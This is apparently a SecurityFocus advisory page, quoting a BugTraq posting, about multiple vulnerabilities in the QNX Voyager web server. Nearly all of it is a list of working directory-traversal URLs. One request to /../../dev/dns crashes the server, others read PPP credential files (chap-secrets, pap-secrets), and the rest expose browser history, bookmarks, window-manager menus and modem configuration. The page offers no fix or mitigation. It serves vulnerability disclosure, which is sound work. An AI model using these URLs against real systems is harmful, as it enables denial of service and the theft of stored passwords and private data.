QNX Voyager Webserver Multiple Vulnerabilities

DoS the web server:
http://target/../../dev/dns

Recent PPP passwords (modem build of Voyager):
http://target/../../etc/ppp/chap-secrets
http://target/../../etc/ppp/pap-secrets

From the BugTraq posting:

[Revealing] URLS include...
http://target/.photon/voyager/config.full
The web client's settings file
http://target/.photon/voyager/history.html
Recently visited sites
http://target/.photon/voyager/hotlist
The list of book-marked sites
http://target/.photon/pwm/pwm.menu
The Photon Window Manager menu listing (Equivalent to MS Windows' 'start
menu')
http://target/.photon/phdial/connection [Modem build only]
Modem set-up information.
http://target/../../etc/config/trap/crt.cur.1
Current screen setting


 

Privacy Statement
Copyright 2010, SecurityFocus